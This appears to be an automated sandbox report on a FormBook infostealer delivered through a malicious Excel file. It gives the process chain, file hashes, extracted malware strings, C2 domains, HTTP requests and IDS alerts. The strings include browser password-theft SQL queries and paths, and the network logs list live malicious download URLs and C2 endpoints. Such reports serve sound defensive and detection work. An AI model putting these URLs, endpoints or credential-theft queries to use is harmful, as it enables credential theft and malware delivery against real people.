File name: | SWIFT19052022.xlsx |
Full analysis: | https://app.any.run/tasks/ebc0c2d9-d946-4548-a720-4bf1edf83f42 |
Verdict: | Malicious activity |
Threats: | FormBook is a data stealer that is being distributed as a MaaS. FormBook differs from a lot of competing malware by its extreme ease of use that allows even the unexperienced threat actors to use FormBook virus. |
Analysis date: | May 20, 2022, 20:57:41 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/encrypted |
File info: | CDFV2 Encrypted |
MD5: | 71336E3B7838EF9EEEE9F819F398463C |
SHA1: | 9CF294E9D1FA8C33591130731022608307DDBD4B |
SHA256: | 4EAAA7DC03CC461A9CFC0BBF593203DBB011B161BB5108E889DBE5C9B906888D |
SSDEEP: | 6144:BRNcsFZ/N7L4m8s/Gpn4rwgd1cbFFSwyTw:BjFZFgm8s+yr1xa |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3100 | "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | — | Explorer.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Excel Version: 14.0.6024.1000 | ||||
1904 | "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | svchost.exe | |
User: admin Company: Design Science, Inc. Integrity Level: MEDIUM Description: Microsoft Equation Editor Exit code: 0 Version: 00110900 | ||||
2628 | "C:\Users\Public\vbc.exe" | C:\Users\Public\vbc.exe | EQNEDT32.EXE | |
User: admin Company: EveryonePiano.com Integrity Level: MEDIUM Description: EveryonePiano Setup Exit code: 0 Version: 1.2.11.30 | ||||
348 | "C:\Windows\System32\cmd.exe" /c timeout 2 | C:\Windows\System32\cmd.exe | — | vbc.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
620 | timeout 2 | C:\Windows\system32\timeout.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: timeout - pauses command processing Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2964 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | — | vbc.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: MSBuild.exe Exit code: 0 Version: 4.0.30319.34209 built by: FX452RTMGDR | ||||
3208 | "C:\Windows\System32\netsh.exe" | C:\Windows\System32\netsh.exe | Explorer.EXE | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Network Command Shell Version: 6.1.7600.16385 (win7_rtm.090713-1255) Formbook(PID) Process(3208) netsh.exe Modules (42)kernel32.dll advapi32.dll ws2_32.dll svchost.exe msiexec.exe wuauclt.exe lsass.exe wlanext.exe msg.exe lsm.exe dwm.exe help.exe chkdsk.exe cmmon32.exe nbtstat.exe spoolsv.exe rdpclip.exe control.exe taskhost.exe rundll32.exe systray.exe audiodg.exe wininit.exe services.exe autochk.exe autoconv.exe autofmt.exe cmstp.exe colorcpl.exe cscript.exe explorer.exe WWAHost.exe ipconfig.exe msdt.exe mstsc.exe NAPSTAT.EXE netsh.exe NETSTAT.EXE raserver.exe wscript.exe wuapp.exe cmd.exe Decoys and strings (143)USERNAME LOCALAPPDATA USERPROFILE APPDATA TEMP ProgramFiles CommonProgramFiles ALLUSERSPROFILE /c copy " /c del " \Run \Policies \Explorer \Registry\User \Registry\Machine \SOFTWARE\Microsoft\Windows\CurrentVersion Office\15.0\Outlook\Profiles\Outlook\ NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ \SOFTWARE\Mozilla\Mozilla \Mozilla Username: Password: formSubmitURL usernameField encryptedUsername encryptedPassword \logins.json \signons.sqlite \Microsoft\Vault\ SELECT encryptedUsername, encryptedPassword, formSubmitURL FROM moz_logins \Google\Chrome\User Data\Default\Login Data SELECT origin_url, username_value, password_value FROM logins .exe .com .scr .pif .cmd .bat ms win gdi mfc vga igfx user help config update regsvc chkdsk systray audiodg certmgr autochk taskhost colorcpl services IconCache ThumbCache Cookies SeDebugPrivilege SeShutdownPrivilege \BaseNamedObjects config.php POST HTTP/1.1 Host: Connection: close Content-Length: Cache-Control: no-cache Origin: http:// User-Agent: Mozilla Firefox/4.0 Content-Type: application/x-www-form-urlencoded Accept: */* Referer: http:// Accept-Language: en-US Accept-Encoding: gzip, deflate
dat= f-start tjwypt.club lexisnexisrissk.com hillsideschnauzer.com thebeautifullifeofthearth.com kaiverse.world underscorestyle.com www86516edu.com gloryworksmn.com mommoth.club buxbuxro.com collettebowman.com westcoastcurecarts.com hbwsjbc.com mapharisacapitalholdings.com wealthybistro.com myfexer.com meetthewinery.com meronbiotech.com theketoking.com veolx.com euromarketinfinity.com bayclabs.xyz i-love-thesex.xyz tdtivolga.com fridom.finance starpart.net flanscheinkauf.com cqtotole.com xnproduct.com spexwest.systems englishkap.xyz bold.insure sarihstore.online classiskink.com bulltrade.group rhontamos.com icklebots.com gtz-w.xyz dublin-roofers.com roomonetwonine.com drenag-eco-life.store restaurantemeatland.com hochatownacm.com getfixedauto.com surprize4u.com lucilliesbbq.com wwwy1me.com seementor.com limitedskin.xyz zzrbruu.xyz petpalaceresortandspa.net knowan.space xlblvd37.xyz rameshgoostar.com thegreenteashots.com kreatywnedzieciaki.com beanflavouredsoup.com id-3484756.space musical.finance rentdefi.xyz vseservices.com parachagroup.net lambertsmarketplace.com fishershardware.com f-end C2www.vitalselfstorage.com/sn12/ | ||||
904 | /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" | C:\Windows\System32\cmd.exe | — | netsh.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
1176 | C:\Windows\Explorer.EXE | C:\Windows\Explorer.EXE | — | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Explorer Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
3100 | EXCEL.EXE | C:\Users\admin\AppData\Local\Temp\CVR1B69.tmp.cvr | — | |
MD5:— | SHA256:— | |||
1904 | EQNEDT32.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\78RFYB7Z\zmb[1].exe | executable | |
MD5:61D8380734DAB62AFB07E2D12CB746AF | SHA256:BFB973A2A005029171EF58CC29552235909FFFFEEED05F5C5D469CDD6D8424CC | |||
2628 | vbc.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\EveryonePiano\Ixjyoejx.exe | executable | |
MD5:61D8380734DAB62AFB07E2D12CB746AF | SHA256:BFB973A2A005029171EF58CC29552235909FFFFEEED05F5C5D469CDD6D8424CC | |||
1904 | EQNEDT32.EXE | C:\Users\Public\vbc.exe | executable | |
MD5:61D8380734DAB62AFB07E2D12CB746AF | SHA256:BFB973A2A005029171EF58CC29552235909FFFFEEED05F5C5D469CDD6D8424CC | |||
3100 | EXCEL.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C4E3CA22.emf | emf | |
MD5:894A796F9211E1080192AC72B6D54A9D | SHA256:8232CC0DF629D8D89A7155A1793B35D611073D60F2BEEC4BABBF78179978B71A | |||
3100 | EXCEL.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6BA5E365.emf | emf | |
MD5:8E3A74F7AA420B02D34C69E625969C0A | SHA256:0CD83C55739629F98FE6AFD3E25A5BCBB346CBEF58BC592C1260E9F0FA8575A9 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2628 | vbc.exe | GET | 200 | 192.185.174.178:80 | http://darley.ml/h/Zzrfmn_Kyaogqlh.bmp | US | gmc | 400 Kb | suspicious |
1176 | Explorer.EXE | GET | 301 | 50.31.188.30:80 | http://www.i-love-thesex.xyz/sn12/?D8=8JAhlDAmh6SZAWlDxWnQN8n40D/BvIgOjONuZlYgfCicyxJstClQxussqCBKCmck49/FHw==&jb8x=gX_XntFPZdnxM | US | — | — | malicious |
1904 | EQNEDT32.EXE | GET | 200 | 192.210.240.37:80 | http://192.210.240.37/d/zmb.exe | US | executable | 26.5 Kb | suspicious |
1176 | Explorer.EXE | GET | 301 | 82.180.174.63:80 | http://www.gtz-w.xyz/sn12/?D8=qlKqemWap+BDm/CFfwEPR89PKrVFsU4yQjBBu6cgintZpospn1y2Q0jsq2fsNOZfxc2t4Q==&jb8x=gX_XntFPZdnxM | DK | html | 707 b | malicious |
1176 | Explorer.EXE | GET | 301 | 185.212.70.59:80 | http://www.fridom.finance/sn12/?D8=1q+racYqO91np9EuUzR1BcjgODnOUPhlK3BpOtk3zjuj0mouWlkxfpN81J9GJYcTngp9uA==&jb8x=gX_XntFPZdnxM | GB | html | 707 b | malicious |
1176 | Explorer.EXE | GET | 403 | 185.53.179.173:80 | http://www.lexisnexisrissk.com/sn12/?D8=p6FQxtvLyf8UvWk6ukS1/IppDDOBuzx3DBhxdCT2UfHVIuZKj6sk+57FzRo1w+Yowa8H6Q==&jb8x=gX_XntFPZdnxM | DE | html | 146 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
1904 | EQNEDT32.EXE | 192.210.240.37:80 | — | ColoCrossing | US | suspicious |
1176 | Explorer.EXE | 185.53.179.173:80 | www.lexisnexisrissk.com | Team Internet AG | DE | malicious |
2628 | vbc.exe | 192.185.174.178:80 | darley.ml | CyrusOne LLC | US | malicious |
1176 | Explorer.EXE | 185.212.70.59:80 | www.fridom.finance | TerraTransit AG | GB | malicious |
1176 | Explorer.EXE | 82.180.174.63:80 | www.gtz-w.xyz | Sagitta ApS | DK | unknown |
1176 | Explorer.EXE | 50.31.188.30:80 | www.i-love-thesex.xyz | Server Central Network | US | malicious |
Domain | IP | Reputation |
---|---|---|
darley.ml |
| suspicious |
www.lexisnexisrissk.com |
| malicious |
www.fridom.finance |
| malicious |
www.i-love-thesex.xyz |
| malicious |
www.gtz-w.xyz |
| malicious |
PID | Process | Class | Message |
---|---|---|---|
1904 | EQNEDT32.EXE | A Network Trojan was detected | ET INFO Executable Download from dotted-quad Host |
1904 | EQNEDT32.EXE | Potentially Bad Traffic | ET CURRENT_EVENTS Terse alphanumeric executable downloader high likelihood of being hostile |
1904 | EQNEDT32.EXE | A Network Trojan was detected | ET CURRENT_EVENTS Likely Evil EXE download from dotted Quad by MSXMLHTTP M1 |
— | — | Potentially Bad Traffic | ET INFO DNS Query for Suspicious .ml Domain |
2628 | vbc.exe | Potentially Bad Traffic | ET POLICY Suspicious Terse Request for .bmp |
2628 | vbc.exe | Potentially Bad Traffic | ET INFO Request to .ML Domain with Minimal Headers |
2628 | vbc.exe | Potentially Bad Traffic | ET INFO HTTP Request to a *.ml domain |
1176 | Explorer.EXE | Generic Protocol Command Decode | SURICATA HTTP Unexpected Request body |
1176 | Explorer.EXE | A Network Trojan was detected | ET TROJAN FormBook CnC Checkin (GET) |
1176 | Explorer.EXE | A Network Trojan was detected | ET TROJAN FormBook CnC Checkin (GET) |